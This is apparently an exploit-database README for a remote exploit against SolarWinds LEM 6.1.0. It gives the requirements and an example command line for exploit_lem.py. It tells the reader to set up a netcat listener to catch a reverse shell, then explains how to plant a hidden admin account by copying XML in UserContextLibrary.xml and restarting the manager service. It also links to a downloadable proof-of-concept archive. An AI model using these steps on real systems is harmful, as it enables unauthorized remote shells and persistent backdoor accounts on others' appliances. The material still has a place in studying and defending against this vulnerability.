31 lines
No EOL
1.2 KiB
Text
31 lines
No EOL
1.2 KiB
Text
Requirements:
|
|
|
|
Python 2.7
|
|
netcat
|
|
|
|
Tested on:
|
|
Ubuntu 14.04 LTS
|
|
|
|
Vulnerable Appliance Version: 6.1.0
|
|
Download: http://downloads.solarwinds.com/solarwinds/Release/LEM/SolarWinds-LEM-v6.1.0-Evaluation-VMware.exe
|
|
|
|
Instructions:
|
|
|
|
The exploit_lem.py script will need to be run sudo since it uses sockets
|
|
which bind to port 21 and 80. These could be changed, but the rest of
|
|
the script would need to be modified as well.
|
|
|
|
Prior to running the python script, set up a netcat listener for the
|
|
reverse shell: netcat -l 4444
|
|
|
|
Example: sudo python exploit_lem.py -t 192.168.1.100 -b 192.168.1.101 -l 192.168.1.101 -lp 4444
|
|
|
|
After access has been gained to the appliance, a new admin user can be added to the web console
|
|
by editing /usr/local/contego/run/manager/UserContextLibrary.xml. Simply copy the xml structure
|
|
for the admin user that is already in there and then change the fields to create a new user. In
|
|
order to get a valid password hash, use the gen_pass_hash.py script included with this package.
|
|
Please note that a manager restart will be needed before you can login with the new user. This
|
|
can be accomplished by running "/etc/init.d/contego-manager restart"
|
|
|
|
Proof of Concept:
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38644.zip |